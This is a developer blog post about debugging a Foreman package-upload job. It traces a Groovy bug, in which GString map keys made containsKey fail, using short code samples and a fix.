Now I've been doing mass changes to our plugin packages, to move them to a shared postinst helper instead of having the same code over and over in every package. This required changes to many packages and sometimes I'd end up building multiple at once. That should be fine, right?

Well, yeah, it did build fine, but the upload only happened for the last package. This felt super weird, especially as I was absolutely sure we did test this scenario (multiple packages in one PR) and it worked just fine…

So I went on a ride though the internals of the job, trying to understand why it didn't work.

This requires a tad more information about the way we handle packages for Foreman:

  • the archive is handled by freight
  • it has suites like buster, focal and plugins (that one is a tad special)
  • each suite has components that match Foreman releases, so 2.5, 3.0, 3.1, nightly etc
  • core packages (Foreman etc) are built for all supported distributions (right now: buster and focal)
  • plugin packages are built only once and can be used on every distribution

As generating the package index isn't exactly fast in freight, we tried not not run it too often. The idea was that when we build two packages for the same target (suite/version combination), we upload both at once and run import only once for both. That means that when we build Foreman for buster and focal, this results in two parallel builds and then two parallel uploads (as they end up in different suites). But if we build Foreman and Foreman Installer, we have four parallel builds, but only two parallel uploads, as we can batch upload Foreman and Installer per suite. Well, or so was the theory.

The Groovy code, that was supposed to do this looked roughly like this:

def packages_to_build = find_changed_packages()
def repos = [:]

packages_to_build.each { pkg ->
    suite = 'buster'
    component = '3.0'
    target = "${suite}-${component}"

    if (!repos.containsKey(target)) {
        repos[target] = []
    }

    repos[target].add(pkg)
}

do_the_build(packages_to_build)
do_the_upload(repos)

That's pretty straight forward, no? We create an empty Map, loop over a list of packages and add them to an entry in the map which we pre-create as empty if it doesn't exist.

Well, no, the resulting map always ended with only having one element in each target list. And this is also why our original tests always worked: we tested with a PR containing changes to Foreman and a plugin, and plugins go to this special target we have…

So I started playing with the code (https://groovyide.com/playground is really great for that!), trying to understand why the heck it erases previous data.

The first finding was that it just always ended up jumping into the "if map entry not found" branch, even though the map very clearly had the correct entry after the first package was added.

The second one was weird. I was trying to minimize the reproducer code (IMHO always a good idea) and switched target = "${suite}-${component}" to target = "lol". Two entries in the list, only one jump into the "map entry not found" branch. What?! 🧐

So this is clearly related to the fact that we're using String interpolation here. But hey, that's a totally normal thing to do, isn't it?!

Admittedly, at this point, I was lost. I knew what breaks, but not why.

Luckily, I knew exactly who to ask: Jens.

After a brief "well, that's interesting", Jens quickly found the source of our griefs: Double-quoted strings are plain java.lang.String if there’s no interpolated expression, but are groovy.lang.GString instances if interpolation is present.. And when we do repos[target] the GString target gets converted to a String, but when we use repos.containsKey() it remains a GString. This is because GStrings get converted to Strings, if the method wants one, but containsKey takes any Object while the repos[target] notation for some reason converts it. Maybe this is because using GString as Map keys should be avoided.

We can reproduce this with simpler code:

def map = [:]
def something = "something"
def key = "${something}"
map[key] = 1
println key.getClass()
map.keySet().each {println it.getClass() }
map.keySet().each {println it.equals(key)}
map.keySet().each {println it.equals(key as String)}

Which results in the following output:

class org.codehaus.groovy.runtime.GStringImpl
class java.lang.String
false
true

With that knowledge, the fix was to just use the same repos[target] notation also for checking for existence — Groovy helpfully returns null which is false-y when it can't find an entry in a Map absent.

So yeah, a String is not always a String, and it'll bite you!